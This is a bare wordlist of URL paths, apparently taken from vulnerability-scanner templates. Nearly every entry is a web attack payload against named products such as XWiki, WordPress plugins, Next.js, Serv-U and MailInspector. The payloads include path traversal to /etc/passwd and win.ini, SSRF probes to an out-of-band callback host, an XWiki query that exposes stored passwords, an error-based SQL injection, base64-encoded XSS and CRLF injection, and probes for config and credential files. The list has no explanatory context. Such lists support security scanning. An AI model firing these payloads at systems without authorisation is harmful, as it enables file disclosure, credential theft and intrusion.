/config.php
/config/config.php
/include/config.php
/includes/config.php
/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+
/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+
/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=
/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=
/%2e%2e/%2e%2e/etc/passwd
/render/info.html
/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(
/static/../../../../etc/passwd
/device/config
/Admin/Admin.aspx
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp
/interview?i=/etc/passwd
/position.js
/pictureproxy.php?url=file:///etc/passwd
/pictureproxy.php?url=http://{{interactsh-url}}
/wp-content/plugins/LayerSlider/assets/static/public/front.css
/API/V1/credentials
/login.rst
/webeditor/../../../windows/win.ini
/api/v1/confup?mode=&uid=1
/api/v1/confup?mode=lean&uid=1
/api/v1/ndconfig?mode=lean&uid=1
/api/v1/ndconfig?mode=&uid=1
/installed_emanual_list.html
/_next/image?w=16&q=10&url=http://{{interactsh-url}}
/_next/image?w=16&q=10&url=https://{{interactsh-url}}
/mailinspector/login.php
/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)
/%5C%5C{{interactsh-url}}/apachehttpd
/{{files}}
/{{http_1_files}}%3ftest.php
/html/usr/share/doc/hostname/copyright%3f
/static/link/%2e%2e/etc/passwd
/login
/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
/api_jsonrpc.php
/{{projectName}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}}
/-/media/doo-doo.ashx
/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/ui/login/register
/_profiler/phpinfo?+--env=dev
/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d
/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d
/info/dir?/
/adama/adama/downloadService?type=1&file=../../../../etc/passwd
/weasis-core/persistence.properties
/?gf_page=randomstring
/api/setup-complete
/elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=../../../../../../../../../../../../../../etc/passwd
/elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=../../../../../../../../../../../../../../path/to/file
/login.do?jvar_page_title=<style><foo>Injected Title</foo></style>
/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt
/?InternalDir=../../../../../Windows&InternalFile=win.ini
/?InternalDir=\\..\\..\\..\\..\\usr\\local\\Serv-U&InternalFile=Serv-U-StartupLog.txt
/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd
/rest/rights/
/clients/MyCRL
/RST_status.htm%00currentsetting.htm
/apply/index.php?url=http://{{interactsh-url}}
/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-content/plugins/uix-shortcodes/readme.txt
/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09
